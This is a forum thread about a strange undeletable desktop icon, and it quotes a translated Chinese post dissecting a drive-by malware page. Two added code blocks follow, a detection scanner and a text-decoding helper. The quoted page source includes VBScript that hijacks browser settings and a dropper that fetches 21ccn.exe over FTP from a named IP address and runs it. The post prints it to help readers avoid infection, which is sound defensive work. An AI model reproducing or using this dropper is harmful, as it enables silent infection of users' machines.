Odd icon appears on my desktop

Both Norton and McAfee report no viruses or trojans. Both are up to date.

Futile Gesture, that is an interesting idea. I’ll see what I can find.

You say your firewall shows no intruder activity. How about outgoing activity?

I use Zone Alarm and it keeps a log of every program that attempts to connect to the 'net, even if I’ve told it to not allow it.

I had a keylogger on my machine for who knows how long, which McAfee and AdAware did not catch. Keeping up with malware is a kind of arms race.

Currently, I use a combination of Ghost Surf Platinum (which did find the keylogger), HijackThis, Spybot, McAfee anti-virus and firewall, and Ad-Aware. They each catch things the others miss.

It’s no longer just questionable sites getting hacked these days. Earlier this year, some major sites, including CitiBank, were compromised by hackers installing keyloggers (probably where I picked up mine).

These days, it’s worth it to go pro, imho. All my traffic is encrypted now.

I forgot to add, CWShredder is a must if you suspect you may have CoolWebSearch (aka CoolWWWSearch) on your machine. It’s particularly nasty. Symptoms include popups and redirection.

Another thing to try is to open the file in a hex editor. This is not for the faint of heart, but a freeware one is available here. Then, open the file from where it lives on disk - probably something like C:\Documents and Settings\<your user name>\desktop\<the filename>

If it’s really a shortcut, the filetype will be .lnk, so the name would be ???1/4.lnk or something similar. In any case, open the file in the hex editor and tell us what’s in it.

On reflection, from the screenshot it doesn’t look like a shortcut since it lacks the little arrow (though this can be turned off by the user with things like TweakUI.) Still would be interesting to see what’s in the file - please paste it here.

I have a hex editor (I’m a software developer.) It will not open the file and it says: Hex Editor cannot open directories. However, it does not show up as a directory or folder either in Explorer or at the command line.

And you and Kythereia are right, it does not seem to be a shortcut.

Here’s an online translation of the page (a message board post):


Publication: 2004-10-31 15:02:53 human spirits:44 [This user main page] [Quotation reply] [Sends the news to sbyking] 	Lou Zhu

[ Original ] traces the QQ virus once more! (2004.10.31)

Sbyking In 2004-03-17 21:06:08 has written named [ Original ] QQ tail track! ! ! The card, the address is
Http://www.Yoyou.Net/bbs/Announce/Announce.Asp?BoardID=42&ID=18610
Today accesses the net also has net friend's QQ to send in such news:

(2004-10-31 13:49:56) God's favored one
Sbyking, I am listening to music.
This DJ music website is really great! You like the DJ music?
I like the DJ music very much. Thinks very the person or household who refuses to move and bargains for unreasonably high compensation when the land is requisitioned for a construction project.
You also listen! Hxxp://www.21ccn.Com/

The stand from under website cannot open directly in the address fence, wants to be poisoned you were casual! ! !

In here you must want above to look the website source code does not open its homepage? Sbyking The method is opens my individual homepage (sbyking to state here is not absolutely in creates propaganda for own rotten website, you if thought like this speech, I but treat unjustly) Http://spyking.8u8.Com/online/ found in this page
"Inputs the website in under to examine the source document" a such line in "above examined" front inputs the website, certainly must bring http:// oh, then clicks "examines", waited for one can be able to open a memorandum. This was this website source code, specifically as follows:

1.

< HTML>
< HEAD>
< TITLE> The handset ting picture, the color letter main terminal I love short note net sms521.Com< /TITLE>
< /HEAD>
< Iframe src=qq06.Htm width=0 height=0 frameborder=0 scrolling=NO> < /iframe>
// sbyking annotation here is the malicious code page! ! !
< Body onunload= "t8 ()" >
< Script Language= "javascript" >
< !--
Var exit=true;
Function t8 ()
{
If (exit)
Window.Open ('Http://www.Yi76.Com')
}
// -->

< /script>
< Center> < Iframe src=http://mms.Homeway.Com.Cn/newsite/index.Asp?Smsid=12190 width=800 height=1900 frameborder=0 scrolling=NO> < /iframe> < /center>

< /body>
< /HTML>
2. Then continues with the above method to examine qq06.Htm source code as follows:

< Object data=qq06i.Test> < /object>
< Object data=qq06.Test> < /object>
3. Then continues with the above method to examine qq06i.Test source code as follows:

< Html>
< Object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'> < /object>

< Script LANGUAGE= "VBScript" >
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Search Page", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\default_page_url", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url1", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url2", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\TypedURLs\url3", "Http://www.21ccn.Com";
wsh.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\First Home Page", "Http://21ccn.Com";
wsh.RegWrite "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel\HomePage",1, "REG_DWORD"
wsh.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools",0, "REG_DWORD"
window.Close
< /script>

< Script LANGUAGE= "VBScript" >
on error resume next
Call LongFei_AddFavorites ("[ brand-new MP3 not [... text garbled in the online translation ...] ","Http://www.Yi76.Com";)

Function LongFei_AddFavorites (N, U)
on error resume next
Set S = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/" + N + ".URL")
S.TargetPath = U
S.Save ()
Set Sl = wsh.CreateShortcut (wsh.SpecialFolders ("Favorites") + "/link/" + N + ".URL")
Sl.TargetPath = U
Sl.Save ()
End Function

Function LongFei_AddDesktop (N, U)
on error resume next
Set S = wsh.CreateShortcut (wsh.SpecialFolders ("AllUsersDesktop") + "/" + N + ".URL")
S.TargetPath = U
S.Save ()
End Function

< /script>
< Script language= "JScript.Encode ">
function closeit () {
setTimeout ("self.Close ()",5)
}
closeit ()
< /script>


< /html>

4. Then continues with the above method to examine qq06.Test source code as follows:
< Html>
< Object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B> < /object>
< Script LANGUAGE= "VBScript" >
Dim fso, tf, wsh
Set fso = CreateObject ("Scripting.FileSystemObject")
Set wsh=createobject ("wscript.Shell")
Set tf = fso.CreateTextFile ("ftp.Txt ", true)
Tf.Write "open 218.6.169.139 "&chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "168" &chr (13) &chr (10)
Tf.Write "get 21ccn.Exe "&chr (13) &chr (10)
Tf.Write "bye"
Tf.Close
A=wsh.Run ("ftp -s:Ftp.Txt ",0, true)
B=wsh.Run ("21ccn.Exe")
Window.Close
< /script>
< Script language= "javascript" >
Function closeit () {
SetTimeout ("self.Close ()",5)
}
Closeit ()
< /script>
< /html>

Subtotal: On saw like this to the website source code, own could not be poisoned! ! ! Actually this certainly does not have what profound technology, only is a small skill! ! Sbyking shares with everybody ~ ~ ~ ~ ~ ~ ~

Well, I know that I like the DJ music. Anyway…
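The translated post inspects each page's source by hand instead of opening it in a browser. As an added example (not part of the thread or of the translated post), here is a small static scanner that flags the same traits in fetched page source: the zero-size iframe, the Windows Script Host ActiveX class ID, the Internet Explorer registry writes, and the scripted FTP download followed by `Run`. The rule names, the `ACTIONS` set and the sample pages (with placeholder host and file names) are constructed for illustration.

```python
import re

# Rule name -> regex over lower-cased page source. Every trait is taken from the
# pages quoted in the translated post; the rule names themselves are made up here.
RULES = {
    "hidden_iframe": r'<\s*iframe\b[^>]*\b(?:width|height)\s*=\s*["\']?0\b',
    "wsh_activex_classid": r'clsid:f935dc22-1cf0-11d0-adb9-00c04fd58a0b',
    "ie_start_page_write": r'regwrite\s*\(?\s*"hkcu\\software\\microsoft\\internet explorer\\main\\',
    "ie_homepage_policy": r'policies\\microsoft\\internet explorer\\control panel\\homepage',
    "registry_tools_policy": r'policies\\system\\disableregistrytools',
    "ftp_script_download": r'ftp\s+-s:',
    "shell_run": r'\.run\s*\(',
    "file_write": r'scripting\.filesystemobject',
}

# Traits that change the machine, as opposed to merely loading hidden content.
ACTIONS = {"ie_start_page_write", "ie_homepage_policy", "registry_tools_policy",
           "ftp_script_download", "shell_run", "file_write"}

def scan(html: str) -> list:
    """Return the sorted names of all rules that match the page source."""
    text = html.lower()
    return sorted(name for name, pat in RULES.items() if re.search(pat, text))

def is_scripted_dropper(hits) -> bool:
    """True when the WSH object is instantiated and at least one action follows."""
    return "wsh_activex_classid" in hits and bool(set(hits) & ACTIONS)

# Constructed sample modelled on the quoted pages; host and file names are placeholders.
SAMPLE_PAGE = """
<iframe src=stage.htm width=0 height=0 frameborder=0></iframe>
<object id=wsh classid=clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B></object>
<script language="VBScript">
wsh.RegWrite "HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://example.invalid"
Set fso = CreateObject("Scripting.FileSystemObject")
a = wsh.Run("ftp -s:ftp.txt", 0, true)
</script>
"""

# Constructed benign page: a visible iframe and nothing else.
BENIGN_PAGE = '<iframe src="news.htm" width=800 height=600></iframe>'

if __name__ == "__main__":
    for label, page in (("sample", SAMPLE_PAGE), ("benign", BENIGN_PAGE)):
        hits = scan(page)
        print(label, hits, "dropper" if is_scripted_dropper(hits) else "no verdict")
```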

Make of that what you will. The highlighted area of red is where 瘀漀爀椀琀攀 was found twice.
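The string quoted above, 瘀漀爀椀琀攀, is what ASCII text stored as UTF-16LE looks like when each 16-bit unit is read with its two bytes swapped, which is also what a viewer shows when it starts decoding one byte out of step. As an added example (not part of the thread), the following reverses that misreading and extracts UTF-16LE strings from a raw buffer at either byte alignment; the sample buffer and the word in it are constructed.

```python
import re

def swap_decode(garbled: str) -> str:
    """Swap the two bytes of every 16-bit unit and decode again."""
    return garbled.encode("utf-16-be").decode("utf-16-le")

def utf16_strings(buf: bytes, min_len: int = 4) -> list:
    """Return (offset, text) for printable-ASCII UTF-16LE runs at any alignment."""
    pattern = re.compile(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len)
    return [(m.start(), m.group().decode("utf-16-le"))
            for m in pattern.finditer(buf)]

def misaligned_view(buf: bytes, offset: int) -> str:
    """Show what a viewer prints when it decodes UTF-16LE starting at `offset`."""
    chunk = buf[offset:]
    chunk = chunk[: len(chunk) - len(chunk) % 2]  # drop a trailing odd byte
    return chunk.decode("utf-16-le", errors="replace")

# Constructed sample: one junk byte, then an ASCII word stored as UTF-16LE,
# so the text starts on an odd offset (the word itself is an assumption).
SAMPLE_CLUSTER = b"\x13" + "Favorites".encode("utf-16-le") + b"\x00\x00"

if __name__ == "__main__":
    print(swap_decode("瘀漀爀椀琀攀"))
    print(repr(misaligned_view(SAMPLE_CLUSTER, 0)))
    print(utf16_strings(SAMPLE_CLUSTER))
```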

Do the contents of the “file” seem familiar? I’m suspecting that something is creating a file entry in the volume MFT and allocating space, but not writing anything. So you’re seeing whatever junk was leftover from the prior use of that particular cluster(s).

An alternative is a slightly fouled up MFT (assuming an NTFS formatted volume). Spurious index entries aren’t unheard of. If you’re on a FAT32 volume, well the odds are even higher this is the source of the problem.

I’d recommend a full backup followed by using the repair & defrag tools. You can also run chkdsk from the command line without the /f parameter to see if you have problems. That won’t fix anything, but it’ll at least tell you whether I’m barking up the right tree and whether you need to go to the hassle of a full backup & repair then defrag.

A co-worker mentioned that Hex Editor was refusing to open this due to the bad characters in the caption. His suggestion is to rename the file and try to open it. I’m not at home, but will try this tonight.